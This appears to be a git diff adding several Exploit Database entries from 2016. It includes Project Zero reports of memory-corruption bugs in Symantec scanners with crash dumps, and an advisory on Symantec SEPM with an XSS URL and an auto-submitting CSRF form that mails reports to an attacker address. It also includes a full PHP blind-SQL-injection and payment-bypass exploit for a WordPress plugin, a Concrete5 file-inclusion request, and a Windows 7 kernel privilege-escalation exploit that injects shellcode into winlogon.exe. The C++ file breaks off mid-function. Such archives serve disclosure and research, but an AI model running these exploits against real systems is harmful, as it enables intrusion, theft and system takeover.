The routine uses a 16bit value read from the file to index a 256 element array without any bounds checking, the attached testcase should demonstrate this reliably. I have verified this on the following products:
Norton Antivirus, Windows
Symantec Endpoint Protection, Linux and Windows
Symantec Scan Engine, Linux and Windows
(534.700): Access violation - code c0000005 (!!! second chance !!!)
eax=00003000 ebx=00003000 ecx=00003000 edx=00002000 esi=16adeb58 edi=16ad8b1b
eip=6ba47ec3 esp=16ad6af0 ebp=16adeb20 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
ccScanw!filelengthi64+0x3af63:
6ba47ec3 66399445fcbfffff cmp word ptr [ebp+eax*2-4004h],dx ss:002b:16ae0b1c=????
0:071> ub
ccScanw!filelengthi64+0x3af3f:
6ba47e9f 8bb5ec7fffff mov esi,dword ptr [ebp-8014h]
6ba47ea5 8bc7 mov eax,edi
6ba47ea7 8985e07fffff mov dword ptr [ebp-8020h],eax
6ba47ead e96d010000 jmp ccScanw!filelengthi64+0x3b0bf (6ba4801f)
6ba47eb2 0fbfc3 movsx eax,bx
6ba47eb5 ba00200000 mov edx,2000h
6ba47eba 8dbdfb9fffff lea edi,[ebp-6005h]
6ba47ec0 0fb7cb movzx ecx,bx
0:071> lmv m ccScanw
start end module name
6b930000 6bb5f000 ccScanw (export symbols) C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Loaded symbol image file: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image name: ccScanw.dll
Timestamp: Tue Jan 26 13:51:55 2016 (56A7EA7B)
CheckSum: 0022B3ED
ImageSize: 0022F000
File version: 13.1.2.19
Product version: 13.1.2.19
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Symantec Corporation
ProductName: Symantec Security Technologies
InternalName: ccScan
OriginalFilename: CCSCAN.DLL
ProductVersion: 13.1.2.19
FileVersion: 13.1.2.19
FileDescription: Symantec Scan Engine
LegalCopyright: Copyright (c) 2015 Symantec Corporation. All rights reserved.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40036.zip

85
platforms/multiple/dos/40037.txt Executable file
View file

@ -0,0 +1,85 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=823
A PowerPoint PPT file is a complicated OLE compound document comprising of a series of streams. The format is described by Microsoft in [MS-PPT].
https://msdn.microsoft.com/en-us/library/office/cc313106(v=office.12).aspx
Symantec have implemented an I/O abstraction layer for seeking within the streams of a compound document, which they use to extract embedded objects like VBA macros and so on. Unfortunately, a bug in this I/O abstraction results in a critical security vulnerability. The bug occurs when a read request can be satisfied from the cache, but from a non-zero start offset. In this case, the request size is always rounded to (CACHE_SIZE - Offset), which may not be correct.
For example, a read request that can be satisfied from the stream cache in these ways:
+-------------------------+
| CACHE |
+-------------------------+
1. <---------> Non-zero offset, but entire cache needed.
2. <------> Zero offset, but not the entire cache.
3. <----------------------> Entire cache.
4. <----> Non-zero offset and not entire cache.
All of these cases work fine except 4, where a buffer overflow occurs, because the request is rounded up to (CACHE_SIZE - Offset). It seems incredible that this bug wasn't found during testing or even on ITW documents just by chance. Nevertheless, by carefully constructing a powerpoint file with a series of records that massage the cache with a series of records, we can trigger a stack buffer overflow of attacker controlled data.
The easiest way to do this is via PPFindRecSet in libdec2ss (this is part of ccScanw.dll on Windows). Early on when processing powerpoint documents Symantec attempt to find the last edit via RT_UserEditAtom, then extract a set of records for RT_List and RT_ExternalObjectList allowing us to massage the stream cache appropriately.
Naturally, Symantec disable /GS on Windows and do not use -fstack-protector, making exploitation absolutely trivial. The attached document redirects execution to 0x41414141 reliably on Windows.
0:065> g
(1074.a14): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=000025a0 ecx=00000200 edx=000025a0 esi=0396e358 edi=00002524
eip=41414141 esp=056df558 ebp=00000000 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
0:065> lmv m ccScanW
start end module name
65820000 65a4f000 ccScanw (deferred)
Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image name: ccScanw.dll
Timestamp: Tue Jan 26 13:51:55 2016 (56A7EA7B)
CheckSum: 0022B3ED
ImageSize: 0022F000
File version: 13.1.2.19
Product version: 13.1.2.19
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Symantec Corporation
ProductName: Symantec Security Technologies
InternalName: ccScan
OriginalFilename: CCSCAN.DLL
ProductVersion: 13.1.2.19
FileVersion: 13.1.2.19
FileDescription: Symantec Scan Engine
LegalCopyright: Copyright (c) 2015 Symantec Corporation. All rights reserved.
The fix is simply to round up requests to MIN(RequestSize, CACHE_SIZE).
I verified this bug exists on the following products:
* Norton Antivirus (All Platforms)
* Symantec Endpoint (All Platforms)
* Symantec Scan Engine (All Platforms)
* Symantec Email Security (All Platforms)
And probably all other Symantec and Norton branded products.
NOTES:
PPGetVBAEmbedListInfo() uses PPFindRecSet(), which is definitely the easiest way to exploit this. The prototype is something like:
int PPFindRecSet(tagSS_STREAM *stream,
unsigned StartOffset,
unsigned EndOffset,
short count,
short *RequiredRecordTypes,
unsigned *RecordOffsets,
int *RecordLengths);
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40037.zip

187
platforms/php/webapps/40041.txt Executable file
View file

@ -0,0 +1,187 @@
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SYMANTEC-SEPM-MULTIPLE-VULNS.txt
[+] ISR: ApparitionSec
Vendor:
================
www.symantec.com
Product:
===========
SEPM
Symantec Endpoint Protection Manager and client v12.1
SEPM provides a centrally managed solution. It handles security policy
enforcement, host integrity checking (Symantec Network Access Control only),
and automated remediation over all clients. The policies functionality is
the heart of the Symantec software. Clients connect to the server to get the
latest policies, security settings, and software updates.
Vulnerability Type(s):
======================
Multiple Cross Site Scripting (XSS)
Cross Site Request Forgeries (CSRF)
Open Redirect
CVE Reference(s):
=================
CVE-2016-3652 / XSS
CVE-2016-3653 / CSRF
CVE-2016-5304 / Open Redirect
Vulnerability Details:
=====================
The management console for SEPM contains a number of security
vulnerabilities that could be used by a lower-privileged user or by
an unauthorized user to elevate privilege or gain access to unauthorized
information on the management server. Exploitation attempts of
these vulnerabilities requires access to the SEP Management console.
References:
============
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_01
Exploit code(s):
===============
In this case XSS can bypass the "http-only" cookie protection because the
SEPM application writes and stores the session ID within various
javascript functions used by the application within the DOM thereby
exposing them directly to the XSS attack.
1) createModalDialogFromURL
2) createWindowFromURL
3) createWindowFromForm
4) createIEWindowFromForm
So all we need to do is alert(createModalDialogFromURL) anyone one of them
(functions) an it will leak the session ID essentially throwing the
HttpOnly secure cookie protection flag into the garbage.
e.g.
XSS POC Defeat http-only flag and access PHPSESSID:
https://localhost:8445/Reporting/Admin/notificationpopup.php?New=1&Type=CR&height=alert%28createModalDialogFromURL%29#
Open Redirect in external URL .php script:
=========================================
A reporting URL used to route generated reports externally to any
authorized URL is susceptible to an open redirect vulnerability
that could have allowed an authorized but less-privileged user to redirect
an unsuspecting privileged user to an external URL to
attempt further exploitation, e.g. phishing.
If a victim clicks on a link supplied by an attacker
e.g.
https://localhost:8445/Reporting/common/externalurl.php?url=http://hyp3rlinx.altervista.org
Cross Site Request Forgery (CSRF):
==================================
Multiple Cross Site Request Forgery exists in couple of places within this
version of SEPM below is an example of sending scheduled report to
an remote attackers email, if current logged in user visits malicious
webpage or clicks infected link etc...
Symantec Reporting Admin CSRF POC:
<form id="PWN" action="https://localhost:8445/Reporting/Reports/sr-save.php"
method="POST" />
<input type="hidden" name="ReportName" value="HELL" />
<input type="hidden" name="Description" value="PWNED!" />
<input type="hidden" name="DisableReportSchedule" value="on" />
<input type="hidden" name="NewReport" value="Y" />
<input type="hidden" name="reporttype" value="1" />
<input type="hidden" name="FILTERNAME" value="Default" />
<input type="hidden" name="runEvery" value="1" />
<input type="hidden" name="repeat" value="weekly" />
<input type="hidden" name="datesched1" value="02%2F10%2F2016" />
<input type="hidden" name="datesched2" value="02%2F10%2F2016" />
<input type="hidden" name="filHourSchedule" value="16" />
<input type="hidden" name="Schedulehour" value="16" />
<input type="hidden" name="filMinSchedule" value="56" />
<input type="hidden" name="Scheduleminute" value="56" />
<input type="hidden" name="sysadmin" value="off" />
<input type="hidden" name="sendto" value="evil@abyss.com" />
<input type="hidden" name="updatelastrun" value="0" />
<input type="hidden" name="HISTORYCONFIG_IDX" value="" />
<input type="hidden" name="ReportPrefix" value="Y" />
<input type="hidden" name="report_idx" value="Y-0" />
<script>document.getElementById('PWN').submit()</script>
</form>
Disclosure Timeline:
============================================
Vendor Notification: Febuary 11, 2016
Vendor Acknowledges Report: Febuary 12, 2016
Vendor Releases Fix: June 28, 2016
June 29, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level(s):
====================
Cross Site Scripting
Medium
v2 6.8
AV:A/AC:M/Au:S/C:C/I:C/A:N
v3 6.7
AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
Cross Site Request Forgery
High
v2 7.0
AV:A/AC:M/Au:M/C:C/I:C/A:C
v3 7.1
AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Open Redirect
Medium
v2 4.1
AV:A/AC:L/Au:S/C:P/I:P/A:N
v3 4.1
AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx

173
platforms/php/webapps/40042.php Executable file
View file

@ -0,0 +1,173 @@
<?php
/**
* Exploit Title: Ultimate Membership Pro WordPress Plugin Exploit
* Google Dorks: inurl:"lid=0" OR inurl:"lid=1" ... inurl:"lid=100" "Register" "Confirm Password"
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://wpindeed.com/
* Software Link: http://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
* Version: 3.3
* Tested on: Debian 8, PHP 5.6.17-3
* Type: Unauthenticated Blind SQLi, Unauthenticated Payment Bypass
* Time line: Found [07-Jun-2016], Vendor notified [08-Jun-2016], Vendor fixed: [Yes], [RD:1466846149]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:l:e:s:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function isTrue($sql){
global $curl, $options;
$levels = "') union all select (SELECT CASE WHEN ($sql) then 1 else 1*(select table_name from information_schema.tables) end)#";
$data = array(
'action'=>'ihc_preview_user_listing',
'shortcode'=>'[ihc-list-users filter_by_level="1" levels_in="'.$levels.'" theme="ihc-theme_1" ]'
);
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
return preg_match('~ihc_public_list_users_(\d+)~',$resp);
}
function exploit(){
global $curl, $options;
if ($options['m'] == 'pay'){
$level = $options['l'];
for($i=$options['s']; $i<$options['e']; $i++){
//This is mental, no IP or Hash check!
echo "Paying Level $level to UserID: $i\n";
$data = array('x_MD5_Hash'=>'1', 'x_response_code'=>'1', 'x_cust_id'=>$i, 'x_po_num'=>$level);
$curl->post($options['t'].'wp-content/plugins/indeed-membership-pro/authorize_response.php', $data);
//echo $curl->getResponse();
}
}
if ($options['m'] == 'sql'){
$query = $options['s'];
echo "'Running' SQL Query: $query\n";
echo "Getting Length";
$max_length = 100;
//Well, it is messed up, can use , (comma) in the query
//Binary search or divide et impera is possible with the BETWEEN operator
//Code it yourself :)
$len = 0;
for ($i=1;$i<$max_length;$i++){
$sql_len = "(select char_length( ($query) ) = $i )";
if (isTrue($sql_len)){
echo "\nLength found: $i\n";
$len = $i;
break;
} else {
echo ".";
}
}
if ($len !== 0 ){
echo "Reading char by char\nResponse:\n";
} else {
die("Failed getting length!\nAboring.\n\n");
}
$charset = 'etaoinsrhdluc@*1234567890.mfywgpbvkxqjzETAOINSRHDLUCMFYWGPBVKXQJZ';
for ($i=1;$i<$len;$i++){
$got = false;
for ($j=0;$j<strlen($charset);$j++){
$chr = $charset[$j];
$question = "SELECT substr(($query) FROM $i FOR 1) = '$chr' ";
if (isTrue($question)){
echo $charset[$j];
$got = true;
break;
}
}
if (!$got){
echo "?";
}
}
echo "\n\n";
}
}
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if (!isset($options['m']) || !in_array($options['m'], array('sql', 'pay') ) ){
return false;
}
if ($options['m'] == 'sql' && !isset($options['s'])) {
return false;
}
if ($options['m'] == 'pay' && ( !isset($options['s']) || !isset($options['e']) || !isset($options['l']))) {
return false;
}
if ($options['m'] == 'pay' && ( !is_numeric($options['s']) || !is_numeric($options['e']) || !is_numeric($options['l']) )) {
echo "In pay mode -s -e and -l must be numeric!\n";
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Ultimate Membership Pro 8.4.1.3 WordPress Plugin Exploit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -m [MODE] -s [QUERY] -s [START] -e [END] -l [LEVEL]
[MODE] sql - Blind SQL Inject mode*
pay - Payment bypass. Parameters -l Level ID (&lid=XX in the url), -s Start UserID, -e End UserID
*Note: You can't use , (comma) in the query.
Examples:
php $argv[0] -t http://localhost/ --tor=yes -m sql -s 'select user()'
php $argv[0] -t http://localhost/ --tor=yes -m pau -s 0 -e 1000 -l 1
Marks all users with UserID between 0 and 1000 as paying customer for level ID 1
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}

88
platforms/php/webapps/40045.txt Executable file
View file

@ -0,0 +1,88 @@
-------------------------------------------------------------------------------
Concrete5 <= 5.7.3.1 (Application::dispatch) Local File Inclusion Vulnerability
-------------------------------------------------------------------------------
[-] Software Link:
https://www.concrete5.org/
[-] Affected Versions:
Version 5.7.3.1 and probably other versions.
[-] Vulnerability Description:
The vulnerable code is located within the "Application::dispatch()" method:
326. public function dispatch(Request $request)
327. {
328. if ($this->installed) {
329. $response = $this->getEarlyDispatchResponse();
330. }
331. if (!isset($response)) {
332. $collection = Route::getList();
333. $context = new \Symfony\Component\Routing\RequestContext();
334. $context->fromRequest($request);
335. $matcher = new UrlMatcher($collection, $context);
336. $path = rtrim($request->getPathInfo(), '/') . '/';
337. try {
338. $request->attributes->add($matcher->match($path));
339. $matched = $matcher->match($path);
340. $route = $collection->get($matched['_route']);
341. Route::setRequest($request);
342. $response = Route::execute($route, $matched);
The vulnerability exists because the path for the incoming request is retrieved using the
"Request::getPathInfo()" method from the Symfony framework, which allows to specify the path
for the request within some HTTP headers (like "X-Original-URL" and some others). So, it might
be possible to specify paths containing "dot-dot-slash" sequences without worrying about URL
encoding and path normalization done by the web server. This could be exploited by unauthenticated
attackers to include arbitrary .php files located outside the Concrete5 root directory or from the
Concrete5 codebase itself (potentially leading to unauthorized access to certain functionalities)
by sending an HTTP request like this:
GET /concrete5/index.php HTTP/1.1
Host: localhost
X-Original-Url: /tools/../../index
Connection: keep-alive
The dispatching process for this request will try to re-include the index.php file,
and this will end up with an unexpected error.
[-] Solution:
Update to a fixed version.
[-] Disclosure Timeline:
[05/05/2015] - Vulnerability details sent through HackerOne
[02/10/2015] - CVE number requested
[19/12/2015] - Vulnerability fixed on the GitHub repository
[26/06/2016] - Vulnerability publicly disclosed on HackerOne
[28/06/2016] - Publication of this advisory
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2016-10
[-] Other References:
https://hackerone.com/reports/59665

389
platforms/win32/local/40039.cpp Executable file
View file

@ -0,0 +1,389 @@
/*
# Exploit Title: Elevation of privilege on Windows 7 SP1 x86
# Date: 28/06-2016
# Exploit Author: @blomster81
# Vendor Homepage: www.microsoft.com
# Version: Windows 7 SP1 x86
# Tested on: Windows 7 SP1 x86
# CVE : 2016-0400
MS16-014 EoP PoC created from
https://github.com/Rootkitsmm/cve-2016-0040/blob/master/poc.cc
Spawns CMD.exe with SYSTEM rights.
Overwrites HaliSystemQueryInformation, but does not replace it, so BSOD will occur at some point
********* EDB Note *********
ntos.h is available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40039.zip
***************************
*/
#include "stdafx.h"
#include <Windows.h>
#include <winioctl.h>
#include "ntos.h"
#include <TlHelp32.h>
typedef union {
HANDLE Handle;
ULONG64 Handle64;
ULONG32 Handle32;
}
HANDLE3264, *PHANDLE3264;
typedef struct {
ULONG HandleCount;
ULONG Action;
HANDLE /* PUSER_THREAD_START_ROUTINE */ UserModeCallback;
HANDLE3264 UserModeProcess;
HANDLE3264 Handles[20];
}
WMIRECEIVENOTIFICATION, *PWMIRECEIVENOTIFICATION;
#define RECEIVE_ACTION_CREATE_THREAD 2 // Mark guid objects as requiring
typedef struct {
IN VOID * ObjectAttributes;
IN ACCESS_MASK DesiredAccess;
OUT HANDLE3264 Handle;
}
WMIOPENGUIDBLOCK, *PWMIOPENGUIDBLOCK;
typedef enum _KPROFILE_SOURCE {
ProfileTime,
ProfileAlignmentFixup,
ProfileTotalIssues,
ProfilePipelineDry,
ProfileLoadInstructions,
ProfilePipelineFrozen,
ProfileBranchInstructions,
ProfileTotalNonissues,
ProfileDcacheMisses,
ProfileIcacheMisses,
ProfileCacheMisses,
ProfileBranchMispredictions,
ProfileStoreInstructions,
ProfileFpInstructions,
ProfileIntegerInstructions,
Profile2Issue,
Profile3Issue,
Profile4Issue,
ProfileSpecialInstructions,
ProfileTotalCycles,
ProfileIcacheIssues,
ProfileDcacheAccesses,
ProfileMemoryBarrierCycles,
ProfileLoadLinkedIssues,
ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;
typedef struct _DESKTOPINFO
{
/* 000 */ PVOID pvDesktopBase;
/* 008 */ PVOID pvDesktopLimit;
} DESKTOPINFO, *PDESKTOPINFO;
typedef struct _CLIENTINFO
{
/* 000 */ DWORD CI_flags;
/* 004 */ DWORD cSpins;
/* 008 */ DWORD dwExpWinVer;
/* 00c */ DWORD dwCompatFlags;
/* 010 */ DWORD dwCompatFlags2;
/* 014 */ DWORD dwTIFlags;
/* 018 */ DWORD filler1;
/* 01c */ DWORD filler2;
/* 020 */ PDESKTOPINFO pDeskInfo;
/* 028 */ ULONG_PTR ulClientDelta;
} CLIENTINFO, *PCLIENTINFO;
typedef struct _HANDLEENTRY {
PVOID phead;
ULONG_PTR pOwner;
BYTE bType;
BYTE bFlags;
WORD wUniq;
}HANDLEENTRY, *PHANDLEENTRY;
typedef struct _SERVERINFO {
DWORD dwSRVIFlags;
DWORD64 cHandleEntries;
WORD wSRVIFlags;
WORD wRIPPID;
WORD wRIPError;
}SERVERINFO, *PSERVERINFO;
typedef struct _SHAREDINFO {
PSERVERINFO psi;
PHANDLEENTRY aheList;
ULONG HeEntrySize;
ULONG_PTR pDispInfo;
ULONG_PTR ulSharedDelta;
ULONG_PTR awmControl;
ULONG_PTR DefWindowMsgs;
ULONG_PTR DefWindowSpecMsgs;
}SHAREDINFO, *PSHAREDINFO;
#define IOCTL_WMI_RECEIVE_NOTIFICATIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)
typedef ULONG(__stdcall *g_ZwMapUserPhysicalPages)(PVOID, ULONG, PULONG);
typedef NTSTATUS(_stdcall *_NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
typedef NTSTATUS(_stdcall *_NtQueryIntervalProfile)(KPROFILE_SOURCE ProfilSource, PULONG Interval);
DWORD g_HalDispatchTable = 0;
void* kHandle;
HWND g_window = NULL;
const WCHAR g_windowClassName[] = L"Victim_Window";
WNDCLASSEX wc;
PSHAREDINFO g_pSharedInfo;
PSERVERINFO g_pServerInfo;
HANDLEENTRY* g_UserHandleTable;
LRESULT CALLBACK WProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
DWORD getProcessId(wchar_t* str)
{
HANDLE hProcessSnap;
PROCESSENTRY32 pe32;
DWORD PID;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
{
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap);
return 0;
}
do
{
if (!wcscmp(pe32.szExeFile, str))
{
wprintf(L"Process: %s found\n", pe32.szExeFile);
PID = pe32.th32ProcessID;
return PID;
}
} while (Process32Next(hProcessSnap, &pe32));
return 0;
}
void Launch()
{
void* pMem;
char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
"\x65\x78\x65\x00";
wchar_t* str = L"winlogon.exe";
DWORD PID = getProcessId(str);
HANDLE hEx = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
pMem = VirtualAllocEx(hEx, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
DWORD res = WriteProcessMemory(hEx, pMem, shellcode, sizeof(shellcode), 0);
HANDLE res2 = CreateRemoteThread(hEx, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, NULL, 0, NULL);
}
BOOL leakHal()
{
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQuerySystemInformation");
PRTL_PROCESS_MODULES pModuleInfo;
DWORD ntoskrnlBase;
DWORD HalDTUser, HalDTOffset;
HMODULE userKernel;
pModuleInfo = (PRTL_PROCESS_MODULES)VirtualAlloc(NULL, 0x100000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (pModuleInfo == NULL)
{
printf("Could not allocate memory\n");
return FALSE;
}
NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, 0x100000, NULL);
ntoskrnlBase = (DWORD)pModuleInfo->Modules[0].ImageBase;
userKernel = LoadLibraryEx(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
if (userKernel == NULL)
{
printf("Could not load ntoskrnl.exe\n");
return FALSE;
}
HalDTUser = (DWORD)GetProcAddress(userKernel, "HalDispatchTable");
HalDTOffset = HalDTUser - (DWORD)userKernel;
g_HalDispatchTable = ntoskrnlBase + HalDTOffset + 0x9000;
return TRUE;
}
BOOL setup()
{
LoadLibraryA("user32.dll");
wc.cbSize = sizeof(WNDCLASSEX);
wc.style = 0;
wc.lpfnWndProc = WProc;
wc.cbClsExtra = 0;
wc.cbWndExtra = 0;
wc.hInstance = NULL;
wc.hCursor = NULL;
wc.hIcon = NULL;
wc.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
wc.lpszMenuName = NULL;
wc.lpszClassName = g_windowClassName;
wc.hIconSm = NULL;
if (!RegisterClassEx(&wc))
{
printf("Failed to register window: %d\n", GetLastError());
return FALSE;
}
g_window = CreateWindowEx(WS_EX_CLIENTEDGE, g_windowClassName, L"Victim_Window", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 240, 120, NULL, NULL, NULL, NULL);
if (g_window == NULL)
{
printf("Failed to create window: %d\n", GetLastError());
return FALSE;
}
g_pSharedInfo = (PSHAREDINFO)GetProcAddress(LoadLibraryA("user32.dll"), "gSharedInfo");
g_UserHandleTable = g_pSharedInfo->aheList;
g_pServerInfo = g_pSharedInfo->psi;
return TRUE;
}
DWORD leakWndAddr(HWND hwnd)
{
DWORD addr = 0;
HWND kernelHandle = NULL;
for (int i = 0; i < g_pServerInfo->cHandleEntries; i++)
{
kernelHandle = (HWND)(i | (g_UserHandleTable[i].wUniq << 0x10));
if (kernelHandle == hwnd)
{
addr = (DWORD)g_UserHandleTable[i].phead;
break;
}
}
return addr;
}
VOID SprayKernelStack() {
g_ZwMapUserPhysicalPages ZwMapUserPhysicalPages = (g_ZwMapUserPhysicalPages)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "ZwMapUserPhysicalPages");
if (ZwMapUserPhysicalPages == NULL)
{
printf("Could not get ZwMapUserPhysicalPages\n");
return;
}
BYTE buffer[4096];
DWORD value = g_HalDispatchTable - 0x3C + 0x4;
for (int i = 0; i < sizeof(buffer) / 4; i++)
{
memcpy(buffer + i * 4, &value, sizeof(DWORD));
}
printf("Where is at: 0x%x\n", buffer);
ZwMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
}
__declspec(noinline) int Shellcode()
{
__asm {
mov eax, kHandle // WND - Which window? Check this
mov eax, [eax + 8] // THREADINFO
mov eax, [eax] // ETHREAD
mov eax, [eax + 0x150] // KPROCESS
mov eax, [eax + 0xb8] // flink
procloop:
lea edx, [eax - 0xb8] // KPROCESS
mov eax, [eax]
add edx, 0x16c // module name
cmp dword ptr[edx], 0x6c6e6977 // <20>winl<6E> for winlogon.exe
jne procloop
sub edx, 0x170
mov dword ptr[edx], 0x0 // NULL ACL
ret
}
}
int main() {
DWORD dwBytesReturned;
HANDLE threadhandle;
WMIRECEIVENOTIFICATION buffer;
CHAR OutPut[1000];
if (!setup())
{
printf("Could not setup window\n");
return 0;
}
PVOID userSC = VirtualAlloc((VOID*)0x2a000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
kHandle = (void*)leakWndAddr(g_window);
memset(userSC, 0x41, 0x1000);
memcpy(userSC, Shellcode, 0x40);
if (!leakHal())
{
printf("Could not leak Hal\n");
return 0;
}
printf("HalDispatchTable is at: 0x%x\n", g_HalDispatchTable);
DWORD value = (DWORD)userSC;
PBYTE buff = (PBYTE)&buffer;
for (int i = 0; i < sizeof(buffer) / 4; i++)
{
memcpy(buff + i * 4, &value, sizeof(DWORD));
}
printf("What is at: 0x%x\n", buff);
buffer.HandleCount = 0;
buffer.Action = RECEIVE_ACTION_CREATE_THREAD;
buffer.UserModeProcess.Handle = GetCurrentProcess();
HANDLE hDriver = CreateFileA("\\\\.\\WMIDataDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDriver != INVALID_HANDLE_VALUE) {
SprayKernelStack();
if (!DeviceIoControl(hDriver, IOCTL_WMI_RECEIVE_NOTIFICATIONS, &buffer, sizeof(buffer), &OutPut, sizeof(OutPut), &dwBytesReturned, NULL)) {
return 1;
}
}
